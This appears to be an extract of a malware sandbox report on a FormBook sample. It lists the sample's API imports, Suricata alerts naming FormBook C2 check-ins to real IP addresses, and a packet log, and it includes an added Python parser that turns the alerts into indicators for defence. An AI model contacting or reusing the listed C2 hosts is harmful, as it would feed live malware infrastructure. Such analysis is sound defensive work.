GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T20:48:55.028761+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49985 | 134.122.133.80 | 80 | TCP
2025-01-10T20:48:55.028761+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49985 | 134.122.133.80 | 80 | TCP
2025-01-10T20:49:10.711109+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:13.275378+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49988 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:15.854514+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:18.456390+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49990 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:18.456390+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49990 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:24.122067+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:26.676734+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:29.242866+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:31.809809+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49995 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:31.809809+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49995 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:39.360380+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:41.906132+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49997 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:44.683696+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:46.967443+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49999 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:46.967443+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:52.737586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50000 | 194.9.94.86 | 80 | TCP
2025-01-10T20:49:55.363011+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50001 | 194.9.94.86 | 80 | TCP
2025-01-10T20:49:57.836126+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 194.9.94.86 | 80 | TCP
2025-01-10T20:50:00.378766+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50004 | 194.9.94.86 | 80 | TCP
                                                                                                                    2025-01-10T20:50:00.378766+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004194.9.94.8680TCP
                                                                                                                    2025-01-10T20:50:06.042071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:08.595629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:11.158931+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:13.690180+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650008194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:13.690180+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650008194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:28.269010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:30.843005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:33.461842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:36.650582+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650012208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:36.650582+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:58.721485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001376.223.67.18980TCP
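The Suricata alert rows of this report come out of the page extraction with their columns run together (timestamp, SID, signature, severity, source IP, source port, destination IP, destination port and protocol fused into one string), which makes the C2 list and the check-in cadence hard to pull out by eye. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in that fused form, resolves the digit-boundary ambiguity between an IP's last octet and the adjacent port, and then summarises the per-C2 sequence of POST and GET check-ins the signatures describe. Two assumptions are built in and labelled in the code: the sandbox client uses Windows' default dynamic source-port range (49152 and up), and the C2 is contacted on a well-known web port (80 or 443). The sample rows are copied from the table above; nothing else is taken from the report.

```python
import re
from collections import defaultdict

# Constructed sample: six rows copied from the Suricata alert table above, in
# the fused one-line form the report extraction produces. Column order follows
# the Joe Sandbox table: Timestamp, SID, Signature, Severity, Source IP,
# Source Port, Dest IP, Dest Port, Protocol.
SAMPLE_ROWS = """\
2025-01-10T20:49:24.122067+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991104.21.112.180TCP
2025-01-10T20:49:26.676734+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993104.21.112.180TCP
2025-01-10T20:49:29.242866+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994104.21.112.180TCP
2025-01-10T20:49:31.809809+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649995104.21.112.180TCP
2025-01-10T20:49:31.809809+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649995104.21.112.180TCP
2025-01-10T20:50:58.721485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001376.223.67.18980TCP
"""

# The prefix is unambiguous: ISO timestamp with UTC offset, 7-digit Emerging
# Threats SID, signature text ending in its single-digit "Mn" variant tag, then
# a one-digit severity. What remains is the fused endpoint tail plus protocol.
HEAD_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+[+-]\d{4})"
    r"(?P<sid>\d{7})(?P<sig>ET(?:PRO)? .+? M\d)(?P<sev>\d)"
    r"(?P<tail>[\d.]+)(?P<proto>TCP|UDP)$"
)

# Assumptions (not stated by the report): the client is a Windows VM whose
# source ports come from the default dynamic range 49152-65535, and the C2 is
# reached on a well-known web port. Both are needed because digits alone admit
# several splits, e.g. '209.74.79.41' + '80' versus '209.74.79.4' + '180'.
EPHEMERAL_MIN = 49152
SERVICE_PORTS = {80, 443}


def _valid_ip(ip):
    octs = ip.split(".")
    return len(octs) == 4 and all(o.isdigit() and str(int(o)) == o and int(o) <= 255 for o in octs)


def _valid_port(p):
    return p.isdigit() and str(int(p)) == p and 1 <= int(p) <= 65535


def split_tail(tail):
    """Split a fused tail such as '192.168.2.649988209.74.79.4180' into
    (src_ip, src_port, dst_ip, dst_port). The six dots fix every octet except
    the last of each IP, so only two seams are ambiguous; try each octet
    length (1-3) at both seams and keep the single split that passes."""
    dots = [i for i, ch in enumerate(tail) if ch == "."]
    if len(dots) != 6:
        raise ValueError(f"expected two dotted quads in {tail!r}")
    src_head = tail[: dots[2] + 1]          # '192.168.2.'
    seam1 = tail[dots[2] + 1 : dots[3]]     # '649988209' = octet, sport, octet
    dst_mid = tail[dots[3] : dots[5] + 1]   # '.74.79.'
    seam2 = tail[dots[5] + 1 :]             # '4180' = octet, dport
    hits = set()
    for a in range(1, 4):
        for c in range(1, 4):
            if a + c >= len(seam1):
                continue
            src_ip, sport, dst_first = src_head + seam1[:a], seam1[a:-c], seam1[-c:]
            for d in range(1, min(4, len(seam2))):
                dst_ip, dport = dst_first + dst_mid + seam2[:d], seam2[d:]
                if not (_valid_ip(src_ip) and _valid_ip(dst_ip)
                        and _valid_port(sport) and _valid_port(dport)):
                    continue
                if int(sport) >= EPHEMERAL_MIN and int(dport) in SERVICE_PORTS:
                    hits.add((src_ip, int(sport), dst_ip, int(dport)))
    if len(hits) != 1:
        raise ValueError(f"ambiguous endpoint split for {tail!r}: {sorted(hits)}")
    return hits.pop()


def parse_alerts(text):
    rows = []
    for line in text.splitlines():
        m = HEAD_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        src, sport, dst, dport = split_tail(m["tail"])
        rows.append({"ts": m["ts"], "sid": int(m["sid"]), "sig": m["sig"],
                     "sev": int(m["sev"]), "src": src, "sport": sport,
                     "dst": dst, "dport": dport, "proto": m["proto"]})
    return rows


def checkin_profile(rows):
    """Per C2 endpoint, the ordered HTTP methods of the distinct flows (one
    flow per source port). Two rules firing on the same flow, as the ET and
    ETPRO GET rules do here, collapse to one entry."""
    flows = defaultdict(dict)
    for r in rows:
        method = re.search(r"\((GET|POST)\)", r["sig"]).group(1)
        flows[(r["dst"], r["dport"])].setdefault(r["sport"], method)
    return {c2: [v[p] for p in sorted(v)] for c2, v in flows.items()}


def iocs(rows):
    """Unique destination endpoints, ready for a block list or hunt query."""
    return sorted({f"{r['dst']}:{r['dport']}" for r in rows})


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ROWS)
    for c2, seq in checkin_profile(parsed).items():
        print(f"{c2[0]}:{c2[1]}  {' -> '.join(seq)}")
    print("IOCs:", ", ".join(iocs(parsed)))
```

Run against the sample, the profile for 104.21.112.1:80 reads POST, POST, POST, GET, which is the rhythm every C2 in the table above shows (three POST check-ins on consecutive source ports, then one GET on which both the ET and the ETPRO rule fire). `split_tail` deliberately refuses to guess when more than one split survives the port constraints, so a row the heuristics cannot settle raises rather than silently yielding a wrong IOC.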
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 20:48:54.166244030 CET | 49985 | 80 | 192.168.2.6 | 134.122.133.80
Jan 10, 2025 20:48:54.171099901 CET | 80 | 49985 | 134.122.133.80 | 192.168.2.6
Jan 10, 2025 20:48:54.171185970 CET | 49985 | 80 | 192.168.2.6 | 134.122.133.80
Jan 10, 2025 20:48:54.241776943 CET | 49985 | 80 | 192.168.2.6 | 134.122.133.80
Jan 10, 2025 20:48:54.246640921 CET | 80 | 49985 | 134.122.133.80 | 192.168.2.6
Jan 10, 2025 20:48:55.028470039 CET | 80 | 49985 | 134.122.133.80 | 192.168.2.6
Jan 10, 2025 20:48:55.028692961 CET | 80 | 49985 | 134.122.133.80 | 192.168.2.6
Jan 10, 2025 20:48:55.028760910 CET | 49985 | 80 | 192.168.2.6 | 134.122.133.80
Jan 10, 2025 20:48:55.031943083 CET | 49985 | 80 | 192.168.2.6 | 134.122.133.80
Jan 10, 2025 20:48:55.036762953 CET | 80 | 49985 | 134.122.133.80 | 192.168.2.6
Jan 10, 2025 20:49:10.098391056 CET | 49987 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:10.103990078 CET | 80 | 49987 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:10.104098082 CET | 49987 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:10.118778944 CET | 49987 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:10.124371052 CET | 80 | 49987 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:10.711013079 CET | 80 | 49987 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:10.711042881 CET | 80 | 49987 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:10.711108923 CET | 49987 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:11.625132084 CET | 49987 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:12.643872023 CET | 49988 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:12.649534941 CET | 80 | 49988 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:12.649663925 CET | 49988 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:12.664268017 CET | 49988 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:12.670737982 CET | 80 | 49988 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:13.275042057 CET | 80 | 49988 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:13.275291920 CET | 80 | 49988 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:13.275377989 CET | 49988 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:14.172020912 CET | 49988 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:15.265252113 CET | 49989 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:15.270329952 CET | 80 | 49989 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:15.270437956 CET | 49989 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:15.325737953 CET | 49989 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:15.330883026 CET | 80 | 49989 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:15.330976009 CET | 80 | 49989 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:15.854110956 CET | 80 | 49989 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:15.854444981 CET | 80 | 49989 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:15.854513884 CET | 49989 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:16.829097986 CET | 49989 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:17.848493099 CET | 49990 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:17.853514910 CET | 80 | 49990 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:17.853632927 CET | 49990 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:17.863284111 CET | 49990 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:17.868170023 CET | 80 | 49990 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:18.456195116 CET | 80 | 49990 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:18.456279039 CET | 80 | 49990 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:18.456389904 CET | 49990 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:18.471919060 CET | 49990 | 80 | 192.168.2.6 | 209.74.79.41
Jan 10, 2025 20:49:18.476994038 CET | 80 | 49990 | 209.74.79.41 | 192.168.2.6
Jan 10, 2025 20:49:23.504332066 CET | 49991 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:23.509344101 CET | 80 | 49991 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:23.509637117 CET | 49991 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:23.523698092 CET | 49991 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:23.529315948 CET | 80 | 49991 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:24.120701075 CET | 80 | 49991 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:24.121984005 CET | 80 | 49991 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:24.122066975 CET | 49991 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:25.031217098 CET | 49991 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:26.067079067 CET | 49993 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:26.072047949 CET | 80 | 49993 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:26.072155952 CET | 49993 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:26.087872982 CET | 49993 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:26.092906952 CET | 80 | 49993 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:26.676137924 CET | 80 | 49993 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:26.676649094 CET | 80 | 49993 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:26.676733971 CET | 49993 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:27.594238043 CET | 49993 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:28.612410069 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:28.617332935 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:28.617420912 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:28.632553101 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:28.637520075 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:28.637552023 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:29.242144108 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:29.242806911 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:29.242866039 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:29.242912054 CET | 80 | 49994 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:29.242969036 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:30.140551090 CET | 49994 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.159280062 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.164205074 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:31.164316893 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.173302889 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.178111076 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:31.809032917 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:31.809735060 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:31.809808969 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.809823036 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:31.809871912 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.814198971 CET | 49995 | 80 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:49:31.818996906 CET | 80 | 49995 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:49:38.174731016 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:38.179791927 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:38.179946899 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:38.200927973 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:38.205780029 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360182047 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360224962 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360238075 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360251904 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360265017 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360285044 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360296965 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360308886 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.360379934 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:39.367150068 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.367180109 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.367192984 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.367238998 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:39.385046005 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.385062933 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.385149002 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:39.385194063 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.385226011 CET | 80 | 49996 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:39.385240078 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:39.385319948 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:39.703130007 CET | 49996 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:40.721946001 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:40.726850033 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:40.726986885 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:40.747273922 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:40.752109051 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.905973911 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.905993938 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906017065 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906028986 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906042099 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906054974 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906069994 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906081915 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906090975 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.906131983 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:41.906202078 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:41.912827015 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.912883997 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.912898064 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.912916899 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:41.912962914 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:41.930399895 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.930421114 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.930507898 CET | 80 | 49997 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:41.930516005 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:41.930557013 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:42.250108957 CET | 49997 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:43.268515110 CET | 49998 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:43.274535894 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:43.274630070 CET | 49998 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:43.289314032 CET | 49998 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:43.294132948 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:43.294258118 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683546066 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683592081 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683614016 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683629036 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683641911 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683655024 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
Jan 10, 2025 20:49:44.683667898 CET | 80 | 49998 | 112.175.247.179 | 192.168.2.6
